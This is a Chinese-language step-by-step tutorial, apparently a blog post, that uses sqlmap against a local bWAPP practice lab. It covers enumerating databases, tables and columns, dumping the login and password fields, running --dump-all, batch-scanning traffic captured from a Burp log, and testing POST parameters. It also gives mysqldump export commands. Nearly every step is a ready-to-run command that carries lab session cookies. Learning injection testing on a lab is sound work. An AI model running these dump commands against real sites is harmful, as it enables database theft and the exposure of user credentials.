使用sqlmap获取数据步骤

文章目录

1.使用sqlmap获取所有数据库

--dbs

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch --dbs

2.使用sqlmap获取当前连接数据库

--current-db

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch --current-db

3.使用sqlmap获取当前数据库下所有表名

-D bwapp --tables

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch -D bwapp --tables

4.使用sqlmap获取当前数据库下某个表下所有列名

-D bwapp -T users --column

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch -D bwapp -T users --column

5.使用sqlmap获取当前数据库下某个表下指定字段的数据

-D bwapp -T users --dump -C "login,password"

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch -D bwapp -T users --dump -C "login,password

6.测试当前用户是否是管理员

--is-dba

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" --is-dba

7.使用burp+sqlmap批量检测

首先打开burp的project options

依次点击Misc,勾选Logging下Proxy的requests

然后起一个保持文件,比如sqlmap.log

接着开启代理,随意访问,比如访问刚才的靶场SQL Injection (GET/Select)

然后它会自动把访问数据包追加到log文件中

接着我们使用sqlmap可以对log里的所有数据进行检测

python sqlmap.py -l G:\资料\sqlmap.log --batch

8.脱库命令

sqlmap脱库方法 --dump-all

可以自动扫描出当前电脑所装所有数据库数据

python sqlmap.py -u "http://127.0.0.1:9004/sqli_2.php?movie=1\&action=go" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" -f -b --batch --dump-all

mysql脱库方法

导出全部数据库

mysqldump -uroot -proot -A > allDatabase.sql

导出全部表空间信息

mysqldump -uroot -proot -A -Y > allTable.sql

9.sqlmap对post包的检测

--data="movie=1&action=go"

--data后面是post包最下面的参数

python sqlmap.py -u "http://127.0.0.1:9004/sqli_13.php" --cookie="BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security_level=0; PHPSESSID=ib6iq6ga4faqpm3ubtmlmmsck0; security=impossible" --data="movie=1&action=go" --batch

相关推荐
Hello.Reader1 小时前
Redis 延迟监控深度指南
数据库·redis·缓存
ybq195133454311 小时前
Redis-主从复制-分布式系统
java·数据库·redis
好奇的菜鸟4 小时前
如何在IntelliJ IDEA中设置数据库连接全局共享
java·数据库·intellij-idea
tan180°4 小时前
MySQL表的操作(3)
linux·数据库·c++·vscode·后端·mysql
满昕欢喜5 小时前
SQL Server从入门到项目实践(超值版)读书笔记 20
数据库·sql·sqlserver
Hello.Reader6 小时前
Redis 延迟排查与优化全攻略
数据库·redis·缓存
简佐义的博客7 小时前
破解非模式物种GO/KEGG注释难题
开发语言·数据库·后端·oracle·golang
爬山算法7 小时前
MySQL(116)如何监控负载均衡状态?
数据库·mysql·负载均衡
老纪的技术唠嗑局10 小时前
OceanBase PoC 经验总结(二)—— AP 业务
数据库
阿里云大数据AI技术10 小时前
OpenSearch 视频 RAG 实践
数据库·人工智能·llm